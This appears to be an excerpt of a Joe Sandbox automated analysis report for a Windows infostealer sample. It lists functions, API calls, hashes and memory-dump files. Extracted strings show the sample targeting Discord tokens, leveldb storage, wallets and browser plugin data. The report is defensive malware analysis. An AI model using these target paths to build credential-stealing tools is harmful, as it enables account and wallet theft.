                                                                                                                                                                                                                                                                                      • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                      • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                                      Function 00411550 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                      • Instruction ID: 15d096accc25870f1c61d4fec85a6e9edf64df49f5c63818c5a2d69bf229bf11
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CAF030756443406BD2209B18DC85B6BB7A9EFC4755F00882DF68957381C6349C1586A6
                                                                                                                                                                                                                                                                                      Function 00411520 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                      • Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
                                                                                                                                                                                                                                                                                      Function 004115B0 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
                                                                                                                                                                                                                                                                                      • Instruction ID: ab5a9e63b36d8a4e180a9fb52d0f1ced6ce58d3d562b5a6390f3396a209e36a0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88219E31608A520FC73A4F3945D0BB6B752AF97245B0DC37FDA4507777DA2A48C54264

                                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                                      Function 00415700 Relevance: 63.5, APIs: 27, Strings: 9, Instructions: 493memorystringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heapmemcmpstrlen$??3@AllocFileFindFirstProcessmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                      • API String ID: 2833195460-599946814
                                                                                                                                                                                                                                                                                      • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                      • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                                      Function 0040BC30 Relevance: 58.5, APIs: 14, Strings: 19, Instructions: 704stringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040BC5A
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040BC6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BCFE
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040BD2F
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BD8B
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BDBC
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BE1F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s\*.*$.metadata-v2$C:\ProgramData\$PSk?$Plugins$Ph=$Wallets$W<?$\storage\default\$%@$+Q$N=$P>$V=$X>$]=$_>$d=$x>
                                                                                                                                                                                                                                                                                      • API String ID: 3353021899-1404224526
                                                                                                                                                                                                                                                                                      • Opcode ID: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                      • Instruction ID: db501d22f0f1181e2ce2af52b6c83326310b215b830042a06cc2d5eef77a8b05
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 759e562b05b4dda549e3d8aaee87314f190ff38e0c5139504980ed7b36fe68fa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86425231A102189BDF04EBA1C9D59FE7769AF44308F4040AEF9066B192DF7CADC5C7A9
                                                                                                                                                                                                                                                                                      Function 0041DD60 Relevance: 51.3, APIs: 28, Strings: 1, Instructions: 502filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041DDB9
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 0041DECA
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 0041DEE8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandlelstrcpy
                                                                                                                                                                                                                                                                                      • String ID: UT
                                                                                                                                                                                                                                                                                      • API String ID: 3205445448-894488996
                                                                                                                                                                                                                                                                                      • Opcode ID: 440306b1dfb058b7a087819529ee374811c9941dc63fc46d873302e09528c2b2
                                                                                                                                                                                                                                                                                      • Instruction ID: ac4f865b8f17060690429e4fd138a7650e313cba3034da994fc339625156bd58
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 440306b1dfb058b7a087819529ee374811c9941dc63fc46d873302e09528c2b2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C12D2B5A087809FD721DF26C48479BBBE1AF95308F14482EE8C687352D738D985CB5A
                                                                                                                                                                                                                                                                                      Function 00414BD0 Relevance: 49.6, APIs: 22, Strings: 6, Instructions: 553stringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414BEE
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00414BFF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00414CA9
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00414CEB
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00414D57
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00414D94
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 00414DFD
